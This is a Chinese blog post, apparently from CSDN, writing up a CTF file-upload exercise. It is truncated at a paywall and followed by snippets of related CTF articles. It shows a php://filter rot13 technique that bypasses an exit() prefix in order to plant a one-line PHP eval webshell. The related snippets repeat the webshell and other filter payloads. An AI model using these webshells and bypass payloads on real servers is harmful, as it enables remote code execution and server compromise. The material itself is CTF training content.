8月1日CTF文件上传训练

最新推荐文章于 2023-12-08 19:32:58 发布
最新推荐文章于 2023-12-08 19:32:58 发布
阅读量1.1k 收藏 1
点赞数
分类专栏: 笔记 文章标签: shell
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/slc3315/article/details/107734299
版权
本文详细介绍了CTF比赛中常见的文件上传漏洞利用技巧,包括伪协议上传、.user.ini文件包含上传和.htaccess文件包含上传。通过实例演示了上传测试、添加ini和htaccess文件的步骤,并强调了一句话木马的正确编写和上传顺序的重要性。
摘要由CSDN通过智能技术生成

题记:
满足于只做出一道题的今天

一、伪协议上传

题目:
在这里插入图片描述
思路:
代码表示需要使用伪协议上传,且不能用base64
dir=php://filter/write=string.rot13/resource=file.php
制作rot13cmd.php
内容:

<?cuc @riny($_CBFG['pzq']);?>
//<?php @eval($_POST['cmd']);?>的rot13编码

在dir处写payload:

php://filter/write=string.rot13/resource=upload/rot13cmd.php
//主要两点,一是上传文件名可以选择与上传文件同名,二是upload文件路径是注释提醒和自己测试出来的

步骤一:上传测试

if (strstr($dir, 'base')) {
        die("not use base");
    }
    @file_put_contents($dir, '<?php exit();?>'.file_get_contents($_FILES['file']['tmp_name']));
   /
最低0.47元/天 解锁文章
陆小朝
关注
专栏目录
731CTF文件漏洞训练
slc3315的博客
07-31 1332
题记 今天主要是文件上传及下载,高难度第三题 一、文件包含 题目: 思路: 文件包含,右键源代码,利用data、filte等伪协议传参 步骤一:发现注入点 右键源代码发现php链接 新页面点击后快速结束,需要抓包 步骤二:伪协议 分析上述代码发现传参file,同时屏蔽了tp、input、data等协议。同时增加了一个flag.php(直接打开可不行) 本页面上编辑伪协议 file=php://filter/read=convert.base64-encode/resource=flag.php bas
c++ eclipse clion mingw-32写jni的dll
chenhuaijin123的博客
06-07 512
本次需求: 利用eclipse,clion,mingw-32在windows 10上为java1.8 32位写一个jni,实现简单的加法及打印字符串 重点:对c++,c的编译即将cpp文件编译成.o文件,修改生成的cpp文件,最后再编译成dll 参考文档:https://juejin.im/entry/5865d619ac502e006d5ee1e1 参考以上文档生成header文件等,我...
文件上传——无验证(ctfhub 文件上传-无限制)
weixin_45864041的博客
01-26 726
文件上传漏洞最简单的就是上传小马,即一句话木马。 例如: <?php @eval($_POST['hacker']);?> 在这简单的一句话中,将会引发巨大的影响,eval函数将会把括号里面的内容当成代码进行执行。 本题中无验证,那我们可以直接上传小马。 上传成功后他告诉了我们上传文件存储的相关路径,如果题目里面没有给出有关的路径,那我们就必须要去猜测文件路径,然后才可以用蚁剑进行连接。 这里连接的密码就是我们前面所写的一句话木马$_POST这个括号里面的内容。 连接成功我们就可以对这
CTF-web 第十三部分 命令注入
热门推荐
iamsongyu的博客
11-25 1万+
一 、基本原理 命令注入指的是,利用没有验证过的恶意命令或代码,对网站或服务器进行渗透攻击。 注入有很多种,并不仅仅只有SQL注入。比如: 命令注入(Command Injection) Eval 注入(Eval Injection) 客户端脚本攻击(Script Insertion) 跨网站脚本攻击(Cross Site Scripting, XSS) SQL 注入攻击(SQL ...
ctf刷题记录
enhengzZ的博客
04-23 1422
基础认证题 页面中依据提示 可猜测用户为admin 可弱口令尝试(admin)------失败 暴脾气,,,词典爆破! 下载其页面提供的词典 抓包处对上图circle处进行解密 在burp的decode模板中进行查询可知其加密方式为base64 载入词典 此处开始走弯路:1.词典所加载的均为密码,缺少用户名(发现问题后,度娘学习正则表达式,很好,又学了个奇奇怪怪的姿势)2.词典爆破后一直都是401返回,长度均为404,没有出现200返回(原因未明) ----------------------------
“古剑山”第一届全国大学生网络攻防大赛初赛(Web部分复盘)
最新发布
Zhiyilang的博客
12-08 1650
“古剑山”第一届全国大学生网络攻防大赛初赛(Web复盘)
87CTF反序列化训练
slc3315的博客
08-08 1630
题目一 题目: 思路: 根据题目提示,存在备份文件,使用御剑或者disteach进行查找,找到www.zip,下载源码进行源码分析,然后构造对应反序列化参数即可 步骤一 源码分析: class Name{ public $username; public $password; function __wakeup(){ $this->username = 'guest'; } function __destruct(){ if
CTF训练
qq_43679873的博客
01-11 1254
CTF训练
CTF训练计划—[SUCTF 2018]GetShell
Lemon's blog
08-19 4489
前言: 这道题考察的是构造无字母数字的webshell,也挺有趣,被卡了一天了,还有看了网上的WP,千篇一律,所以很有必要记录一下。 [SUCTF 2018]GetShell 直接给出源码 <?php if($contents=file_get_contents($_FILES["file"]["tmp_name"])){ $data=substr($contents,5); foreach ($black_char as $b) { if (stripos($data
ctfshow web入门 php特性
Sentiment的博客
04-11 5408
web89 intval() 函数用于获取变量的整数值,可preg_match过滤了数字,这里可以用数组绕过,因为preg_match无法处理数组 <?php include("flag.php"); highlight_file(__FILE__); if(isset($_GET['num'])){ $num = $_GET['num']; if(preg_match("/[0-9]/", $num)){ die("no no no!"); } if
php eval一句话木马干啥的,<?php eval($_POST[cmd]);?>一句话木马解读
weixin_39875503的博客
03-09 3722
php网页木马代码,大家可以看下自己的网站里面是不是有这样的代码,注意网站安全用mcafee限制w3wp.exe生成php或者asp文件。并在php.ini中设置一下。php网页木马header("content-Type:text/html;charset=gb2312");if(get_magic_quotes_gpc())foreach($_POSTas$k=>$v)$_POST[...
ctf技能树----文件上传
qq_44418229的博客
05-10 1144
ctf技能树----文件上传
小白的ctf之路之文件上传浅谈
glass_york的博客
01-12 1696
文件上传
CTF下的文件上传
Lemon's blog
05-06 9475
前言: CTF下的文件上传考法也有很多种,结合做过的题目进行一个总结。
文件包含中伪协议的利用
E1even的博客
06-22 1863
文件包含一直没有整理知识,今天就用这篇文章梳理一下解题吧 伪协议: 首先说一下:./ 与…/的区别: ./是:当前目录 …/是父级目录 fillter、file用来读取文件源码: filter协议用于读取源码居多,读取路径是相对路径,较为轻松。一般拿来读取index.php源码 ?file=php://filter/read=convert.base64-encode/resource=./flag.php 这里说一下,php这里可以大写 例如: 使用filter读取源码,方便我们下一步 说说file协
PHP学习之PHP上传文件
大前端程序猿
04-01 1023
用一个例子记录使用PHP上传文件的方法: 1、编写上传界面index.php,代码如下: 这里必须注意的是,上传文件需要在表单中指定enctype属性为multipart/form-data 2、接收文件,编写另外一个文件,取名为upload.php,代码如下: <?php //获取文件类型 $type = $_FILES["file"]["type"]; //获取文件大小
关于php 中file_put_contents 和fwrite file_get_contents和curl
LAMP
06-12 443
file_put_content本质上仍然是 fopen(),fwrite(),fclose()de
2019年-SUCTF
unexpectedthing的博客
12-30 3375
文章目录checkinwpEasySQL非预期解预期解Easyweb考点wpPythonginxnginx重要文件位置wp方法1--非预期解方法2方法3 checkin 考点:利用.user.ini来上传文件 wp 首先这个题就是用.user.ini或者.htaccess来绕过 我们传png文件,看到exif_imagetype:not image! exif_imagetype,就是用来检查图像类型的 必须要gif文件,但是我们在文件内容上加个魔法头GIF89a,就可以绕过 我们用后缀为.user.in
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值